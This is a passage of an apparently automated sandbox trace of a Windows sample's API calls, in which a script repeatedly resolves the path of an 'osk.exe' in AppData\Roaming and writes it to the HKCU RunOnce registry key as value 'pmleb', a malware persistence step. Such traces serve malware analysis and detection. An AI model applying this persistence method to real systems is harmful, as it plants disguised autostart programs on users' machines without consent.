riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.333] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x35 [0079.333] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.334] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0079.334] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.334] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.334] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.334] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.334] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.334] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.334] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.334] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.335] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.335] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.335] RegCloseKey (hKey=0x280) returned 0x0 [0079.335] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.335] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.335] SetTimer (hWnd=0x20280, nIDEvent=0x2034, uElapse=0xa, lpTimerFunc=0x0) returned 0x2034 [0079.335] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.347] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.347] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.347] KillTimer (hWnd=0x20280, uIDEvent=0x2034) returned 1 [0079.348] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.348] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.348] IUnknown:Release (This=0x787518) returned 0x1 [0079.348] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.348] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.348] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.348] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.348] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.349] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0079.349] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.349] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x36 [0079.349] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.349] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0079.349] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.350] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.350] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.350] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.350] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.350] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.350] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.350] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.350] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.350] RegCloseKey (hKey=0x280) returned 0x0 [0079.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.350] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.351] SetTimer (hWnd=0x20280, nIDEvent=0x2035, uElapse=0xa, lpTimerFunc=0x0) returned 0x2035 [0079.351] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.363] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.363] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.363] KillTimer (hWnd=0x20280, uIDEvent=0x2035) returned 1 [0079.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.363] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.363] IUnknown:Release (This=0x787518) returned 0x1 [0079.363] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.363] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.363] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.364] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.364] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.364] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0079.364] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.364] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x37 [0079.364] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.365] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0079.365] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.365] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.365] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.365] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.365] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.365] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.365] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.365] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.366] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.366] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.366] RegCloseKey (hKey=0x280) returned 0x0 [0079.366] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.366] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.366] SetTimer (hWnd=0x20280, nIDEvent=0x2036, uElapse=0xa, lpTimerFunc=0x0) returned 0x2036 [0079.366] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.378] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.378] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.378] KillTimer (hWnd=0x20280, uIDEvent=0x2036) returned 1 [0079.379] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.379] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.379] IUnknown:Release (This=0x787518) returned 0x1 [0079.379] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.379] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.379] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.379] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.379] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.379] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.379] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.380] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.380] 